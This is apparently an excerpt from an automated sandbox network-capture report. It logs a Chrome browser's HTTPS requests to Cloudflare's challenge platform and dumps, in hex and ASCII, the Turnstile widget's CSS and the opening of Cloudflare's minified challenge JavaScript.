                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                                                                                                                                                                            Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                                                                                                                                                                            Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                                                                                                                                                                            Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                                                                                                                                                                            Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                                                                                                                                                                            Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                                                                                                                                                            Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                                                                                                                                                            2025-01-10 12:36:35 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                                                                                                                                            Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            122192.168.2.1749841104.18.94.414435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ffcb6abdab37d06&lang=auto HTTP/1.1
                                                                                                                                                                                                                                            Host: challenges.cloudflare.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/qvn8h/0x4AAAAAAA3bQQTeiQr3m2wy/auto/fbE/normal/auto/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC331INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:36 GMT
                                                                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 114516
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6afcfe28cad-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                                                                                                                                                                                            Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC1369INData Raw: 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 65 6e 64 25 32 30 46 65 65 64 62 61 63 6b 22 2c 22 6e 6f 74 5f 65 6d
                                                                                                                                                                                                                                            Data Ascii: %22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_feedback_description":"Send%20Feedback","not_em
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC1369INData Raw: 2c 66 4e 2c 66 4f 2c 66 50 2c 66 5a 2c 67 61 2c 67 65 2c 67 68 2c 67 69 2c 67 66 2c 67 67 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 31 34 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 37 39 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 34 38 31 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 32 36 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 33 39 35 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 34 33 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 32 39 36 29 29 2f 37 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28
                                                                                                                                                                                                                                            Data Ascii: ,fN,fO,fP,fZ,ga,ge,gh,gi,gf,gg){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(514))/1*(parseInt(gI(1379))/2)+parseInt(gI(481))/3+parseInt(gI(1126))/4+-parseInt(gI(395))/5+-parseInt(gI(1443))/6*(-parseInt(gI(296))/7)+parseInt(gI(
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC1369INData Raw: 4a 2c 6f 3d 7b 27 6f 71 4f 63 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 4e 6a 4a 6d 66 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 76 50 71 58 72 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 61 4b 66 41 69 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3c 48 7d 2c 27 6c 7a 54 4b 67 27 3a 68 6a 28 39 32 30 29 2c 27 41 61 59 43 5a 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 74 44 4a 76 74 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 2c 27 52 54 6b 56 64 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b
                                                                                                                                                                                                                                            Data Ascii: J,o={'oqOcZ':function(G,H){return G<H},'NjJmf':function(G,H){return G===H},'vPqXr':function(G,H){return G(H)},'aKfAi':function(G,H){return G<H},'lzTKg':hj(920),'AaYCZ':function(G,H){return G+H},'tDJvt':function(G,H,I){return G(H,I)},'RTkVd':function(G,H){
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC1369INData Raw: 31 38 29 5d 29 3b 2d 31 3d 3d 3d 67 5b 6c 5d 5b 68 6d 28 31 35 37 37 29 5d 28 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 26 26 28 69 5b 68 6d 28 39 35 39 29 5d 28 66 35 2c 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 7c 7c 67 5b 6c 5d 5b 68 6d 28 34 35 38 29 5d 28 27 6f 2e 27 2b 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 29 2c 6d 2b 2b 29 3b 7d 65 6c 73 65 20 67 5b 6c 5d 3d 68 5b 6a 5b 6b 5d 5d 5b 68 6d 28 34 31 37 29 5d 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 68 6e 29 7b 72 65 74 75 72 6e 20 68 6e 3d 68 6d 2c 69 5b 68 6e 28 31 32 39 30 29 5d 28 27 6f 2e 27 2c 6e 29 7d 29 7d 2c 65 4d 5b 67 4a 28 35 39 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 66 38 28 63 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 66 36 28 66 37 28 63 29 29 7d 7d 2c 66 39 3d
                                                                                                                                                                                                                                            Data Ascii: 18)]);-1===g[l][hm(1577)](h[j[k]][m])&&(i[hm(959)](f5,h[j[k]][m])||g[l][hm(458)]('o.'+h[j[k]][m])),m++);}else g[l]=h[j[k]][hm(417)](function(n,hn){return hn=hm,i[hn(1290)]('o.',n)})},eM[gJ(593)]=function(c){try{return f8(c)}catch(e){return f6(f7(c))}},f9=
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC1369INData Raw: 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 49 73 6f 70 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 48 76 67 6b 52 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 66 68 4c 6a 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 63 57 41 68 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 54 6e 45 42 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 78 56 4c 58 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 61 65 64 46 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75
                                                                                                                                                                                                                                            Data Ascii: tion(h,i){return h!=i},'Isopm':function(h,i){return h&i},'HvgkR':function(h,i){return h(i)},'fhLju':function(h,i){return h(i)},'cWAhu':function(h,i){return h>i},'TnEBy':function(h,i){return i*h},'xVLXT':function(h,i){return h&i},'aedFy':function(h,i){retu
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC1369INData Raw: 64 5b 68 43 28 31 30 32 31 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 43 28 31 32 36 37 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 68 43 28 31 30 30 39 29 5d 28 38 2c 73 29 3b 48 3d 64 5b 68 43 28 36 37 35 29 5d 28 48 3c 3c 31 2c 64 5b 68 43 28 37 36 39 29 5d 28 4d 2c 31 29 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 68 43 28 34 35 38 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 64 5b 68 43 28 31 35 30 32 29 5d 28 73 2c 46 29 3b 48 3d 64 5b 68 43 28 36 37 35 29 5d 28 48 3c 3c 31 2c 4d 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 68 43 28 34 35 38 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30
                                                                                                                                                                                                                                            Data Ascii: d[hC(1021)](o,H)),H=0):I++,s++);for(M=C[hC(1267)](0),s=0;d[hC(1009)](8,s);H=d[hC(675)](H<<1,d[hC(769)](M,1)),I==j-1?(I=0,G[hC(458)](o(H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;d[hC(1502)](s,F);H=d[hC(675)](H<<1,M),I==j-1?(I=0,G[hC(458)](o(H)),H=0):I++,M=0
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC1369INData Raw: 4d 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 68 43 28 34 35 38 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 44 3d 3d 30 26 26 46 2b 2b 7d 66 6f 72 28 4d 3d 32 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 68 43 28 38 38 30 29 5d 28 48 2c 31 29 7c 64 5b 68 43 28 37 36 39 29 5d 28 4d 2c 31 29 2c 64 5b 68 43 28 34 35 36 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 68 43 28 34 35 38 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 48 3c 3c 3d 31 2c 64 5b 68 43 28 31 30 33 35 29 5d 28 49 2c 64 5b 68 43 28 31 35 36 35 29 5d 28 6a 2c 31 29 29 29 7b 47 5b 68 43 28 34 35 38 29 5d 28 6f 28 48 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 49 2b
                                                                                                                                                                                                                                            Data Ascii: M),I==j-1?(I=0,G[hC(458)](o(H)),H=0):I++,M>>=1,s++);D--,D==0&&F++}for(M=2,s=0;s<F;H=d[hC(880)](H,1)|d[hC(769)](M,1),d[hC(456)](I,j-1)?(I=0,G[hC(458)](o(H)),H=0):I++,M>>=1,s++);for(;;)if(H<<=1,d[hC(1035)](I,d[hC(1565)](j,1))){G[hC(458)](o(H));break}else I+
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC1369INData Raw: 28 31 33 35 38 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 46 28 31 30 39 38 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 68 46 28 31 32 31 39 29 5d 28 30 2c 4e 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 68 46 28 36 36 34 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4f 2c 44 5b 68 46 28 34 35 38 29 5d 28 4f 29 3b 3b 29 7b 69 66 28 64 5b 68 46 28 33 38 37 29 5d 28 49 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 46 28 34 39 36 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 64 5b 68 46 28 37 36 39 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48
                                                                                                                                                                                                                                            Data Ascii: (1358)](G,H),H>>=1,H==0&&(H=j,G=d[hF(1098)](o,I++)),J|=(d[hF(1219)](0,N)?1:0)*F,F<<=1);O=d[hF(664)](e,J);break;case 2:return''}for(E=s[3]=O,D[hF(458)](O);;){if(d[hF(387)](I,i))return'';for(J=0,K=Math[hF(496)](2,C),F=1;K!=F;N=d[hF(769)](G,H),H>>=1,0==H&&(H
                                                                                                                                                                                                                                            2025-01-10 12:36:36 UTC1369INData Raw: 64 65 27 3a 65 5b 68 48 28 35 30 38 29 5d 2c 27 72 63 56 27 3a 65 4d 5b 68 48 28 39 36 31 29 5d 5b 68 48 28 37 32 36 29 5d 7d 2c 27 2a 27 29 29 7d 2c 67 29 7d 2c 65 4d 5b 67 4a 28 36 37 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 2c 68 2c 68 49 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 29 7b 69 3d 28 68 49 3d 67 4a 2c 7b 27 6e 4f 62 58 65 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 28 46 29 7d 2c 27 62 47 75 68 45 27 3a 66 75 6e 63 74 69 6f 6e 28 45 2c 46 29 7b 72 65 74 75 72 6e 20 45 7c 7c 46 7d 2c 27 59 4d 61 58 62 27 3a 68 49 28 31 36 36 33 29 2c 27 49 4f 4a 42 42 27 3a 68 49 28 31 31 38 35 29 2c 27 69 5a 56 6e 6c 27 3a 68 49 28 31 36 31 31 29 2c 27 6a 78 66 59 63 27 3a 68 49 28 31 34 35 32
                                                                                                                                                                                                                                            Data Ascii: de':e[hH(508)],'rcV':eM[hH(961)][hH(726)]},'*'))},g)},eM[gJ(677)]=function(f,g,h,hI,i,j,k,l,m,n,o,s,x,B,C,D){i=(hI=gJ,{'nObXe':function(E,F){return E(F)},'bGuhE':function(E,F){return E||F},'YMaXb':hI(1663),'IOJBB':hI(1185),'iZVnl':hI(1611),'jxfYc':hI(1452


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
